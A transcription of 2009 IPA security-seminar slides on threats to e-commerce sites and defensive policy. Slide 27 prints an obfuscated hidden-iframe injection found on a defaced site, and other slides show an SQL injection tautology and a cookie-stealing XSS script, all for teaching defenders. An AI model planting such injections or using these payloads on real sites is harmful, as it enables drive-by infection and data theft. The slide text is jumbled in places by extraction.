1. 今 何が起こっているのか? 1.1 インターネットを取り巻く状況は? 1.2 ウェブアプリケーションの脆弱性 1.3 ウェブサイト形態と対応責任 2. 脆弱性の解説 3. ウェブサイトのセキュリティ対策方針 4. セキュリティ対策ツールの紹介 Copyright 2009 独立行政法人情報処理

Transcription

1 ネット通販セキュリティ対策セミナー ネット通販サイトにおける脅威と対策方針 ~ 近年の脅威やその対策方針 セキュリティ対策ツールの紹介など ~ 独立行政法人情報処理推進機構セキュリティセンター Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー

2 1. 今 何が起こっているのか? 1.1 インターネットを取り巻く状況は? 1.2 ウェブアプリケーションの脆弱性 1.3 ウェブサイト形態と対応責任 2. 脆弱性の解説 3. ウェブサイトのセキュリティ対策方針 4. セキュリティ対策ツールの紹介 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 2

3 1.1 インターネットを取り巻く状況は? 本日お越しの皆様は 今インターネット上でどのような状況となっているかわかりますか? 恐ろしい状況の前に まずはネット通販の特色から Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 3

4 ネット通販の利便性 インターネットを利用した通信販売は 新鮮な情報をいち早く掲載でき 柔軟な価格設定やキャンペーン等の販促も手軽に実施可能で また利用者登録により利用者への利便性も上げられ 従来の通信販売と比べ飛躍的に営業効率を上げられる このようなメリットから どれだけ売上げを上げられるか 成功の秘訣 効果的な広告掲載 購買分析 などデザインや表現を重視したウェブサイトを開発する事になる Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 4

5 ネット通販における考慮など これらの考えは事業発展における重要なファクターである もちろん ネット通販における規制 や 広告メールに関する規制 など各種規制関連は対策され守られるものである またクレーム対策などのノウハウは蓄積されている しかし 次の問題は解決されているか? Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 5

6 インターネット上の被害例 ( その 1) 価格情報提供サイト 2005 年 5 月 ウェブサイトに不正なプログラムが仕掛けられ 閲覧したユーザがウイルスに感染したという事を発表 ウェブサイトのプログラムを直すそばから何者かにより改ざんされていった その後攻撃の頻度が急増しサイトを閉鎖 (10 日間の閉鎖 ) 登録ユーザのメールアドレス2 万 2511 件漏えい 5 月の月間 PVは 前月比で約 4 割減 取引業者への影響大 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 6

7 インターネット上の被害例 ( その 2) 音響機器 楽器通販サイト 2008 年 4 月 サイバー攻撃により顧客情報が 10 万件弱流出した可能性がある事を発表 クレジットカード情報が不正利用され 2008 年 3 月にカード会社が検知し判明 セキュリティ会社の調査により 2006 年 6 月頃に最初の不正侵入があった事が判明 会員 12 万 2884 人に1000 円を次回購入時割引 セキュリティ会社への作業依頼とサーバ交換等で6,000 万円強の費用をかけた対策を行った Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 7

8 インターネット上の被害例 他にもインターネット通販サイト等に 多くの被害が取り沙汰されている クレジットカード番号や個人情報の漏えい 健康食品や医薬品販売サイト 化粧品販売サイト 雑貨販売サイト 釣具 アウトドア用品販売サイト これは代表的な内容であり 毎日のようにホームページが攻撃され被害が出ている ウイルス感染などを引き起こすウェブサイトの改ざん ウイルス対策ソフト開発会社 自動車情報サイト 政府関連のウェブサイト 家庭用ゲーム会社のウェブサイト ( 米国 ) など Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 8

9 ネット通販をとりまく脅威 (*1) フィッシングサイト ( 別ドメイン利用 脆弱性利用 ) 偽情報の表示カード番号やパスワード等の情報漏えい 他人へ なりすまし 商品の購入 DB (*2) に蓄積された非公開情報の閲覧 重要 ( 個人 ) 情報漏えい DB に蓄積された情報の改ざん 消去 偽情報の表示 パスワード変更 システム停止ウイルス感染サイト化 (*1) 脅威とは 被害に繋がるような状態 (*2) DB( データベース ): 関連し合うデータを収集 整理して 検索や更新を効率化したファイル Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 9

10 脆弱性による脅威 これらの脅威は ウェブアプリケーションに脆弱性が存在する事が原因で その脆弱性を悪者が利用し攻撃した事によるものです クロスサイト スクリプティングの脆弱性 フィッシングサイト ( 脆弱性利用 ) なりすまし SQL インジェクションの脆弱性 DB に蓄積された 非公開情報の閲覧 情報の改ざん 消去 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 10

11 1.2 ウェブアプリケーションの脆弱性 本日のセミナーでは 最近大きな被害に繋がっているウェブアプリケーションの脆弱性 に関するセキュリティ対策を取り上げる Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 11

12 そもそも脆弱性ってなに? 脆弱性 ( ぜいじゃくせい ) とは コンピュータ不正アクセスやコンピュータウイルスなどの攻撃により その機能や性能を損なう原因となり得るセキュリティ上の問題箇所のこと ( 出典 : 情報セキュリティ早期警戒パートナーシップガイドライン ) 脆弱性を利用すると 問題点箇所を巧みに悪用し コンピュータの内部データ ( 情報 ) を盗んだり 書き換えたり 削除したり また他のコンピュータへの同様の悪事を働くことが可能となる ( これが不正アクセスであり プログラム化して自動的に動作するのがウイルスやボットである ) 脆弱性対策は根本的なセキュリティ対策 要は 第三者からの攻撃 セキュリティ対策としてウイルスなどの対策も十分必要だが 脆弱性を無くすことが最も重要!! Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 12

13 ウェブアプリケーションとは? ウェブページは 2 つのタイプに分けられる 静的ページ いつ見ても変わらぬ内容を表示 ( 画像やテキスト文字等 ) 静的なコンテンツをウェブサーバが表示する 動的ページ 入力された内容を元に DB へ問合せ 必要な情報を取得し それを元にウェブページを生成し表示する 利用者が入力した内容を確認するページなどが該当 SNS ブログ 電子掲示板 ショッピングカートなど 動的ページを作りだすプログラムがウェブアプリケーション Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 13

14 1.3 ウェブサイト形態と対応責任 N o 代表的な通販サイトの形態と脆弱性対応責任 サイト形態形態概要脆弱性の可能性脆弱性対応責任 1 オーサリングツール利用 2 ポータルサイト構築ソフトウェア製品利用 3 独自開発のうえ利用 4 ISP 提供サービス利用 5 ショッピングモール等のサービスを利用 ウェブページ作成ソフトウェア製品を使い 自分でホームページを作成する方法 ショッピングカート 電子掲示板 ブログ Wiki 等のウェブアプリケーションソフトウェア製品 (CMS 等 ) を使う方法 機能やデザインを独自なものとする為 自社や委託先でウェブアプリケーションを開発し それを使う方法 ISP が CMS や DB 等を活用し 簡単ホームページ作成 と言うようなサービスを提供 それを使う方法 ショッピングモールで提供している 支払決済や配送なども含めたショッピング機能を使う方法 Copyright 2009 独立行政法人情報処理推進機構 ウェブページ作成用サンプルプログラムや 機能モジュールに脆弱性 製品そのものが抱える脆弱性 独自でカスタマイズし利用する事もあり カスタマイズ部分に脆弱性が発生する可能性あり 脆弱性が発生する可能性あり セキュリティを十分考慮した設計 開発がなされていないと その可能性が高い ISP はウェブアプリケーションソフトウェア製品を利用しており 製品に脆弱性が発見される可能性あり ショッピングモールで利用しているウェブアプリケーションソフトウェア ( 独自開発やソフトウェア製品 ) に脆弱性が発見される可能性あり 製品の脆弱性は製品開発者に対応責任があるが サイト運営者として最新版製品を入手し サイトに反映させる責任がある 製品の脆弱性の場合は No1 の対応責任と同様 独自の場合はサイト運営者の責任で対処する 自社開発であれ委託開発であれ サイト運営者に対応責任がある ISP が製品の管理まで行う場合は ISP が対応 ISP は製品のインストールまでで 後の対応はサイト運営者責任のケースもある ショッピングモールが対応 ネット通販セキュリティ対策セミナー 14

15 対応責任を踏まえたサイト運営者の役割 自社 ( 委託を含む ) 責任の場合 脆弱性の原理や対策方法の理解 および対策 委託発注時にセキュリティ要件を盛込む 委託契約内容の確認 ( 脆弱性発生時の保守など ) 製品開発者責任の場合 製品仕様の確認 ( 脆弱性なのか機能が不十分なのか ) 製品開発者への脆弱性報告 ( 後述のパートナーシップを利用 ) 製品が対策された時点で サイト運営者がサイトに反映させる サービス提供者責任の場合 (ISP やモールなど ) サービス規定の確認 ( 脆弱性等不具合への対応責任 ) サービス提供者への連絡 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 15

16 1. 今 何が起こっているのか? 2. 脆弱性の解説 2.1 情報セキュリティ早期警戒パートナーシップ 2.2 脆弱性関連情報の届出状況 2.3 クロスサイト スクリプティング 2.4 SQLインジェクション 3. ウェブサイトのセキュリティ対策方針 4. セキュリティ対策ツールの紹介 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 16

17 弱 調整機関 脆性関連情報届出性関連情報通知2.1 情報セキュリティ早期警戒 パートナーシップ ( 脆弱性関連情報の届出制度 ) 脆弱性情報を適切に流通させるために 不適切な脆弱性の公開による問題は実際に発生しており それを解決させるために 2004 年 7 月経済産業省告示 ソフトウエア等脆弱性関連情報取扱基準 が制定された これを踏まえ IPA JPCERT/CC など 6 団体から 脆弱性関連情報の適切な流通により コンピュータ不正アクセス コンピュータウイルスなどによる被害発生を抑制するために 関係者に推奨する行為をとりまとめた 情報セキュリティ早期警戒パートナーシップガイドライン が公表された 対応状況の集約公表日調整等 受付分析機関 脆弱Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 17

18 2.2 脆弱性関連情報の届出状況 届出累計が 5,000 件を突破! 脅威的な届出件数 届出開始から約 4 年間で 2,045 件 ここ 1 年間で 3,206 件 1 日に平均 4.6 件の届出 ( 最大 142 件 / 日 2008 年 11 月 7 日 ) 脆弱性関連情報の届出件数の四半期別推移 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 18

19 ウェブサイト脆弱性届出の 種類別内訳 ウェブサイト脆弱性の種類は クロスサイト スクリプティング と SQL インジェクション が約 6 割を占める ウェブサイトの脆弱性として IPA に届けられ受理した 4,235 件の内訳 ~ 届出開始から 2009 年第 1 四半期 (2009 年 3 月末 ) まで ~ Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 19

20 2.3 クロスサイト スクリプティング 誘導型攻撃のイメージ 能動的攻撃 攻撃者は 直接サーバなどを攻撃する イントラネット内への攻撃は難しい 攻撃される側の行動は不要で いつでも攻撃可能 受動的 ( 誘導型 ) 攻撃 攻撃者は 利用者が特定の行動をとるよう誘導する FW で通信を許可している ウェブやメール等を利用した攻撃 イントラネット内のシステムの攻撃に よく用いられる Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 20

21 誘導型 攻撃が増えた背景 近年のネットワーク環境の変化により 多くのネットワークにファイアウォールの導入が進んだ 個人のような小規模なネットワークであっても Windows ファイアウォール のように OS に標準搭載されたファイアウォールが機能するようになった 利用者が罠のウェブページやメールを閲覧することで 成立する攻撃に移行 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 21

22 誘導型 攻撃のイメージ 迷惑メール経由の攻撃例 a) 書かれているリンク先は 人気動画サイトの URL に見せかけているが 実際のリンク先はウイルスが埋め込まれているウェブサイト b) ここをクリックすると ウイルスがダウンロードされる! Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 22

23 クロスサイト スクリプティングの動作 ( その 1) 利用者 利用者 検索キーワード 1 3 IPA を含む検索結果 検索キーワード <s>ipa</s> 3 IPA を含む検索結果 Copyright 2009 独立行政法人情報処理推進機構 IPA ウェブサーバ 1 <s> は 取り消し線を引く HTML タグ ウェブサーバ 2 2 <html> IPA を含む検索結果 </html> <html> <s>ipa</s> を含む検索結果 </html> "<" および ">" が出力され HTML タグとして認識されてしまう ( 表示が崩れる ) ネット通販セキュリティ対策セミナー 23

24 クロスサイト スクリプティングの動作 ( その 2) 脆弱なウェブサーバへのリンク ( 悪意のスクリプトを含む ) セッション ID や Cookie 一般利用者 5 スクリプト実行 1 6 悪意のあるウェブサーバ 検索キーワード <script> document.cookie </script> 2 4 を含む検索結果ウェブサーバ 悪意のあるウェブサーバにセッション Cookie をこっそり送信するようなスクリプト 3 <script> document. cookie </script> を含む検索結果 スクリプトがページ内に書き込まれる ウェブページに好きな文章等を表示させる ( ページ改ざん ) ブラウザ上からは見えない命令を書き込み 情報を盗む Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 24

25 2.4 SQL インジェクション SQL インジェクション攻撃による ウイルス感染イメージ Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 25

26 ウェブサイトへの攻撃が増えた背景 攻撃対象のサイトへ 2006 会員認証年に出現したサポート先 MPack オプションや IcePack 罠サイトへ誘導するなどのウェブサイト攻撃ツールによって攻略される仕組みを埋め込む ウェブサーバやウェブアプリケーションの複数の頻繁にアップデートも 各種ウイルス対策ソフトに脆弱性を自動的に攻撃する機能や管理機能を備え 販売されている 攻撃先 URL Copyright 2009 独立行政法人情報処理推進機構 サポートが充実 検出されない旨をアピール 価格 ( 元を日本円換算 ) 1ヶ月 : 6,000 円 ウェブサイトの改ざんは 他の攻撃と同様 目に見えない形で行われる傾向がある 2ヶ月 :15,000 円 4ヶ月 :30,000 円 6ヶ月 :45,000 円中国では決して安くない しかしこのソフトにも脆弱性が存在 (^_^;) 認証が回避可能な裏ツールも出回る インラインフレームやスクリプトなどといった 不可視 攻撃対象の脆弱性ファイル形式の状態でウェブサイトに挿入できるものが混入される ため 利用者がウェブブラウザから閲覧しただけでは違いが全く判らない ネット通販セキュリティ対策セミナー 26

27 ウェブサイトの改ざん例 <iframe src=' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4760be4c05e00(v4760be4c065f7){ function v4760be4c06def () {return 16;} return(parseint(v4760be4c065f7,v4760be4c06def()));}function v4760be4c07de0(v4760be4c081dc){ var v4760be4c085d9='';for(v4760be4c089d5=0; v4760be4c089d5<v4760be4c081dc.length; v4760be4c089d5+=2){ v4760be4c085d9+=(string.fromcharcode(v4760be4 c05e00(v4760be4c081dc.substr(v4760be4c089d5, 2))));}return v4760be4c085d9;} document.write(v4760be4c07de0('3c e77696e646f772e D27446F6E65273B646F63756D656E742E C D65206E616D653D D5C A2F2F37372E E E F2E69662F676F2E68746 D6C3F272B4D E726F756E64284D E72616E646F6D28292 <iframe src=' width='1' height='1' style='visibility: hidden;'></iframe><script>function.. A B C D D C653D5C C61793A206E6F 6E655C273E3C2F D653E27293C2F E'));</script> Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 27

28 SQL インジェクションの動作 SQL 文例 SELECT * FROM user WHERE id= $ID 一般利用者 4 john の情報 ID john 1 1 ID john or A = A ウェブサーバ 4 + ウェブアプリ全てのユーザ悪意を持つ人の情報 SELECT * FROM user WHERE id= john ' user データベース SELECT * FROM user WHERE id= john or A = A ' john or A = A 全て を意味する データベースから重要な情報が盗まれてしまう Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 28

29 SQL インジェクションの攻撃傾向 出典 : 株式会社ラック SQL インジェクション攻撃検知 (2009 年 2 月まで ) より Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 29

30 1. 今 何が起こっているのか? 2. 脆弱性の解説 3. ウェブサイトのセキュリティ対策方針 3.1 ネット通販における他の脅威と対策 3.2 セキュリティ確保のための基本対策 4. セキュリティ対策ツールの紹介 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 30

31 3.1 ネット通販における他の脅威と対策 ウェブアプリケーションの脆弱性以外にも脅威は存在する 紙媒体 記録媒体 (USB,CD ) 等の紛失 盗難メール等の誤送信 マネジメント的対策 ( ポリシー ルールの策定と運用 ) 技術的対策 ( 接続装置の制御 記憶媒体の暗号化 ) ウイルス ワーム感染 ウイルス対策ソフトの利用 ウェブサーバの設定ミスなど不適切な運用 サーバの要塞化 通信の盗聴 SSL などの暗号化通信 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 31

32 3.2 セキュリティ確保のための基本対策 セキュアなウェブサイトを構築 維持するためには 全体を見通した出来るだけ漏れがない対策を 組織的に実施することが重要 製製製製 ササササ セキュリティ予算確保 開発の委託 セキュアな開発 適切なサーバ構築 ID パスワードの強化 設定情報のバックアップ ログ収集 セキュリティ対策機器の導入 監視 セキュリティ監査 セキュリティ事故発生を想定した体制作りと運用 セキュリティメンテナンス この基本対策は 自社でウェブサイトを構築管理している事を対象としている ソフトウェア製品利用時には サービス利用時には 製サ Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 32

33 セキュリティ予算確保 製 サ セキュリティ確保のために予算化 ウェブサイト運営にはセキュリティ対策の責任がある セキュリティ対策や維持には相応の費用が必要 脆弱性を作り込まぬために必要な費用 セキュリティは時間と共に強度が低下するため維持する費用 ウェブサイト運営の企画段階から開発や運用に必要なセキュリティ予算を検討し確保する 上司や予算担当者への説得 セキュリティ対策の重要性と必要費用を説明 セキュリティ対策は費用対効果が計りづらいものだが 安全性を訴えた積極的なサイト運営を特色とするのも手ではないか Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 33

34 開発の委託 セキュリティ発注要件の必要性 従来の開発では 契約上セキュリティに関する要件は十分な内容ではなかった その結果 脆弱性のようなセキュリティに関する問題が発覚しても 委託側 受注側ともに不幸な結果を招く事が多い 特に委託側に新たな費用を必要とする傾向がある セキュリティ要件を盛り込む 瑕疵担保契約にて責任を明確する 発注仕様や要求仕様に具体的な要求仕様を盛り込む 参考 :JNSAセキュアシステム開発ガイドライン Webシステムセキュリティ要求仕様 (RFP) 編 β 版 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 34

35 セキュアな開発 セキュリティを確保したウェブアプリケーションの開発にはセキュリティ ( 脆弱性 ) の知識が必須 自社で開発する上では十分理解する必要がある 脆弱性の理解 脅威の仕組みや問題の原因を正しく理解する 知っていますか? 脆弱性 ( ぜいじゃくせい ) 安全なプログラミング 安全にプログラムを作成する知識を身に付ける 安全なウェブサイトの作り方 セキュア プログラミング講座 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 35

36 適切なサーバ構築 セキュリティを考慮したシステム構成 ネットワークセグメントの分離 外部セグメント DMZ( 非武装地帯 ) の設置 内部セグメント サーバ要塞化 最小構成 不要なサービスの停止 不要なアプリケーションの削除 最新のソフトウェア構成 アクセスコントロール設定 インターネット 職務に応じた適切なアクセス権 外部セグメント ファイアウォール ウェブサーバ メールサーバ DNS サーバ DMZ DB サーバ 内部セグメント Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 36

37 ID パスワードの強化 製 サ パスワード管理を徹底 不要なアカウントの削除 辞書に載っている文字列は使わない 長くて複雑なパスワード設定 ( 英字 + 数字 + 記号 ) SSH 接続を使う場合 公開鍵認証方式を利用 パスワードをどうしても利用する場合は徹底管理 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 37

38 設定情報のバックアップ ログ収集 正常時の設定情報などを保管 各サーバ設定内容 変更記録 作業手順など とにかく資料を残す 画面キャプチャーでも可 必要なログ UNIX 系 OS ログイン ログアウト プロセスの起動 終了 コマンド実行など Windows 系 OS ログオン ログオフ アプリケーションの起動と停止 システム設定の変更 各種イベントの発生状況など Web サーバ 各クライアントからのアクセス履歴 エラーログなど ログ解析の警告メールの自動送信化 NTP 時刻同期 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 38

39 セキュリティ対策機器の導入 監視 FW IDS/IPS WAFの設置と防御のイメージ ファイアウォール ファイアウォール IDS/IPS 内部から外部への不要な通信を許可している場合が多い WAF サーバ IDS( 侵入検知システム )/IPS( 侵入防止システム ) IDS は通信回線を監視しネットワークへの侵入を検知して管理者に通報するシステム IPS は IDS の機能を拡張し 侵入を検知したら接続の遮断などの防御をリアルタイムに行なう機能を持つ WAF(Web Application Firewall) IDS/IPS ではパケットの中身に危険なコードが含まれていても中身までは解析できないことがあるが WAF ではパケットの中身までを解析し 危険なコードをブロックすることができる リアルタイム監視これらのセキュリティ対策機器を利用し 発生した警告をすぐさま察知し 問題の通信を瞬時に防ぐ事が大切である 24 時間 365 日対応できるエキスパートを自社雇う若しくは育てる 専門のセキュリティベンダーに任せる ( 餅は餅屋 ) Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 39

40 セキュリティ検査 セキュリティ検査 ウェブアプリケーション検査 ウェブサイト公開にあたり十分なセキュリティ対策が行われているか 第三者からの検査にて問題点を確認し 問題があれば対処のうえ公開する 時間とともに新たな脆弱性が発見されるので 定期的な検査も重要 情報セキュリティ監査企業台帳 情報セキュリティ監査をサービスとして行う主体を登録 情報セキュリティ対策ベンチマーク 組織のセキュリティ対策状況を自ら評価するための自己診断ツール Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 40

41 参考 情報セキュリティ監査企業台帳 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 41

42 参考 情報セキュリティ対策ベンチマーク Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 42

43 参考 PCI DSS(Payment Card Industry Data Security Standard) PCI DSSは クレジット決済サービスに携わる事業者の間で クレジットカード情報や決済情報を保護するための基準を共通化することを目的とした 情報セキュリティ基準である PCI DSSは 国際ペイメントブランド5 社 (Visa, Master, American Express, Diners, JCB) が共同で設立した機関であるPCI SSC(Security Standards Council) が2006 年 9 月から策定 運用しているもので 事実上の世界標準となりつつある PCI DSSの規程は 安全なネットワークの構築と維持 や 脆弱性管理プログラムの整備 などの6 分野を対象とし ファイアウォールをインストールして構成を維持すること や アンチウィルスソフトウェアまたはプログラムを使用し 定期的に更新すること など 合計で12の要件を定めている 要件は具体的に記載されており 解釈の違いが起こりにくくなっている クレジット決済事業者はPCI DSSへの準拠が義務化されつつある 義務化される時期やその内容は 国や事業者の規模等によって異なる 日本の大規模店舗の場合 あるペイメントブランドにおいて2010 年 9 月 30 日に義務化される見込みであり 他のネットショップ事業者 決済代行事業者などにおいても対応が必要と見込まれる Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 43

44 セキュリティ事故発生を想定した 体制作りと運用 製 サ セキュリティ事故が起こると 被害はその会社だけに留まらず 取引先や関係者にも大きな影響を与える 事故が起きる前に 事故対応の準備が必要 社内体制の確立 役割分担の決定 ( 特に責任者 ) 連絡経路の整備 運用手順書などの作成 模擬訓練 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 44

45 セキュリティメンテナンス 製 サ 情報収集と対策の実施 脆弱性は日々発見されるので OS やソフトウェアの開発者から提供される脆弱性情報を継続的に入手し ソフトウェアの更新や問題の回避が必要 日頃の情報収集 JVN JVN ipedia MyJVN IPA 利用製品ベンダーのHP 各種 ML ニュースサイト セキュリティパッチの検証環境 テスト系サーバの確保 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 45

46 参考 脆弱性対策情報ポータルサイト & データベース JVN(Japan Vulnerability Notes) & JVN ipedia JVN JVN 製品開発者と調整した脆弱性対策情報をタイムリーに公開 JVN ipedia JVN ipedia 国内で利用されている製品を対象にした脆弱性対策情報を網羅し蓄積 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 46

47 1. 今 何が起こっているのか? 2. 脆弱性の解説 3. ウェブサイトのセキュリティ対策方針 4. セキュリティ対策ツールの紹介 4.1 情報セキュリティ対策ツール情報 4.2 ilogscanner 4.3 ウェブサイト運営者のための脆弱性対応ガイド 4.4 安全なウェブサイト運営入門 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 47

48 4.1 情報セキュリティ対策ツール情報その 1 脆弱性の理解 知っていますか? 脆弱性 ( ぜいじゃくせい ) - アニメで見るウェブサイトの脅威と仕組み - 脆弱性を作らないために 安全なウェブサイトの作り方改訂第 3 版 新版 セキュア プログラミング講座 脆弱性攻撃の状況把握 ウェブサイトの脆弱性検出ツール ilogscanner 脆弱性が発見されたら ウェブサイト運営者のための脆弱性対応ガイドウェブサイトの事件を体験 安全なウェブサイト運営入門 -7つの事件を体験し ウェブサイトを守り抜け!- Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 48

49 4.1 情報セキュリティ対策ツール情報その 2 不正アクセスの被害を受けたら 不正アクセスに関する届出 電子メールのセキュリティ 電子メールの安全性を高める技術の利用法企業向けセキュリティ対策 大企業 中堅企業情報システムのセキュリティ対策 ~ 脅威と対策 ~ 小規模企業のための情報セキュリティ対策リモートアクセス リモートアクセス環境におけるセキュリティ Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 49

50 4.2 ilogscanner( ウェブサイトの脆弱性検出ツール ) 自前でウェブサイトを構築している運営者 どれほどの攻撃を受けているか 攻撃による被害が発生していないか 常に状況を把握し対策を検討する必要がある 攻撃の状況を確認するためには 特別なスキルが必要 自前でセキュリティ技術者の育成や 有償のセキュリティ監視サービスを受ける必要がある 一般のサイト運営者が簡単に確認できない Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 50

51 4.2 ilogscanner( ウェブサイトの脆弱性検出ツール ) ilogscanner がウェブサイトのアクセスログを解析 ウェブサイトへの攻撃痕跡を確認可能 一部の痕跡に関しては 攻撃が成功した可能性を確認可能 ただし ilogscanner は簡易ツール 攻撃と思われる痕跡を全て網羅し 確実に検出するものではない 誤検出もあり得る ilogscannerで攻撃が検出された場合 セキュリティベンダーへの相談をお勧め Copyright 2009 独立行政法人情報処理推進機構 過信は禁物 ネット通販セキュリティ対策セミナー 51

52 4.2 ilogscanner( ウェブサイトの脆弱性検出ツール ) 脆弱性の種類 攻撃と思われる痕跡 攻撃が成功し可能性が高いと思われる痕跡 SQLインジェクション クロスサイト スクリプティング - OSコマンド インジェクション (*1) - ディレクトリ トラバーサル (*2) - その他 (IDS 回避を目的とした攻撃 ) (*3) - (*1) OS コマンド インジェクションとは Web サーバ上の任意の OS コマンドが実行されてしまう問題です これにより Web サーバを不正に操作され 重要情報などが盗まれたり 攻撃の踏み台に悪用される場合があります (*2) ディレクトリ トラバーサルとは 相対パス記法を利用して 管理者が意図していない Web サーバ上のファイルやディレクトリにアクセスされたり アプリケーションを実行される問題です これらにより 本来公開を意図しないファイルが読み出され 重要情報が盗まれたり 不正にアプリケーションを実行されファイルが破壊されるなどの危険があります (*3) その他 (IDS 回避を目的とした攻撃 ) とは 16 進コード 親パス等の特殊文字を使用して偽装した攻撃用文字列で攻撃が行われることによりアプリケーションの妥当性チェック機構を迂回し SQL インジェクション クロスサイトスクリプティング等の攻撃を行うことを狙ったものです また ワームなどが悪用する Web サーバの脆弱性を突いた攻撃でも このような特殊文字が使われます それぞれの攻撃に応じた対策が必要になります Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 52

53 4.2 ilogscanner( ウェブサイトの脆弱性検出ツール ) 検出環境 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 53

54 4.2 ilogscanner( ウェブサイトの脆弱性検出ツール ) 解析結果ログ表示 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 54

55 4.2 ilogscanner( ウェブサイトの脆弱性検出ツール ) 解析結果サマリー表示 Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 55

56 4.3 ウェブサイト運営者のための 脆弱性対応ガイド もしも脆弱性が発見されたらどうします? 対応方法の手引き ガイドの構成 脆弱性や修正に関する基本的な知識 脆弱性を放置することの問題 外部から脆弱性の存在を指摘された場合どうするべきか 具体的な脆弱性の確認 修正の作業手順 など Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 56

57 4.3 ウェブサイト運営者のための ガイドの内容 1. ウェブサイトの危険性 1.1. 背景 1.2. ウェブサイトで起こるトラブル 1.3. 運営者に問われる責任 1.4. 本資料の目的 2. ウェブサイトに必要な対策 2.1. トラブルの原因となる脆弱性 2.2. 求められる継続的な対策 2.3. 対策実施にあたり理解すべきこと 3. ウェブサイトに脆弱性が見つかった場合 3.1. 脆弱性をどのように見つけるか 3.2. IPA から脆弱性に関する連絡を受けた場合 3.3. 対応は意思決定から始まる 脆弱性対応ガイド 4. ウェブサイト運営者のための脆弱性対応マニュアル 4.1. 対応の全体に係る留意点 4.2. 脆弱性に関する通知の受領 4.3. セキュリティ上の問題の有無に関する調査 4.4. 影響と対策の方向性の検討 4.5. 対策作業に関する計画 4.6. 対策の実施 4.7. 修正完了の報告 4.8. その他 付録 : 脆弱性について通知を受けた場合の作業チェックリスト Copyright 2009 独立行政法人情報処理推進機構 ネット通販セキュリティ対策セミナー 57

58 4.4 安全なウェブサイト運営入門 セキュリティ対策は経営的にコストとしか考えられていない 積極的な経営戦略と捉えるべき しかし現実には 痛い目を見ないと 動こうとしない お金を使おうとしない それじゃぁいけないだろう 事故起こしてからでは遅い Copyright 2009 独立行政法人情報処理推進機構 攻撃されるしかない やられるしかない と考えがち 擬似的に事故を体験し脅威を理解させられないか 自分の意志で対応を選択するゲームのような 面白く わかりやすい教材はないか ネット通販セキュリティ対策セミナー このようなコンセプトから生まれたのが... 58

59 Copyright 2009 独立行政法人情報処理推進機構ネット通販セキュリティ対策セミナー 59

